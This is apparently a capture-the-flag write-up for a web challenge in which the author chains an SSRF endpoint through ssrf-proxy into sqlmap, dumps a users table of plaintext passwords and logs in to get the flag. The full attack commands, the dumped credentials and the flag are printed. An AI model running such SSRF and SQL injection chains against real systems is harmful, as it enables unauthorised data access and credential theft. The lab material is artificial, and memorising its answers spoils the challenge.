Triskel 2 : Going in
Category: Airport hall/web
20 points
What did you do? You shouldn’t have access to this chat, but you can’t do anything from it right?
by Remsio
Solution
The continuation from the moment, when I ended Triskel 1 challenge.
There was one interesting thing in source of chat page - search option (French chercher).
Few attempts to SQLi gave me 400 Bad Request which reassured me that I’m on the right track.
I’ve decided to automate the process, my choice was to use combination of ssrf_proxy with sqlmap. Note, that it was
my first approach to these tools.
Launched ssrf_proxy as below. I’ve set --rules=noproto to remove the http:// prefix from uri injection string.
ssrf-proxy -u http://10.45.4.38:8100/api/call_api.php?api=xxURLxx --rules=noprotoThen, I’ve used sqlmap as below.
export ALL_PROXY=http://127.0.0.1:8081
sqlmap -u http://10.0.42.200/?search=% --dumpThe interesting part from the output was user_news table.
Database: db
Table: user_news
[6 entries]
+----+----------------------------+----------------------+
| id | password | username |
+----+----------------------------+----------------------+
| 1 | D.!uTra+b+wrUVH5s?^AE3a~X | admin_richard_lauren |
| 2 | X^UY6M=ohMA_ek3g{}Pm:mw:&A | admin_denis_valette |
| 3 | 69PCrHE287Tavvg | dev_arienne_dupuy |
| 4 | JC44n24D6ejGKym | dev_leroy_bedart |
| 5 | FwX6Pk29x2uAz7S | dev_pomeroy_dagenais |
| 6 | ypGk2ZtM7QRt343 | dev_denis_tetrault |
+----+----------------------------+----------------------+I’ve tried to login with dev_leroy_bedart credentials on http://10.45.4.38:8100/ website and found the flag on
Admin subpage.
Flag
NORZH{Hidden_C0r0n4_ch4t_y0u_are_the_admin_now!:)}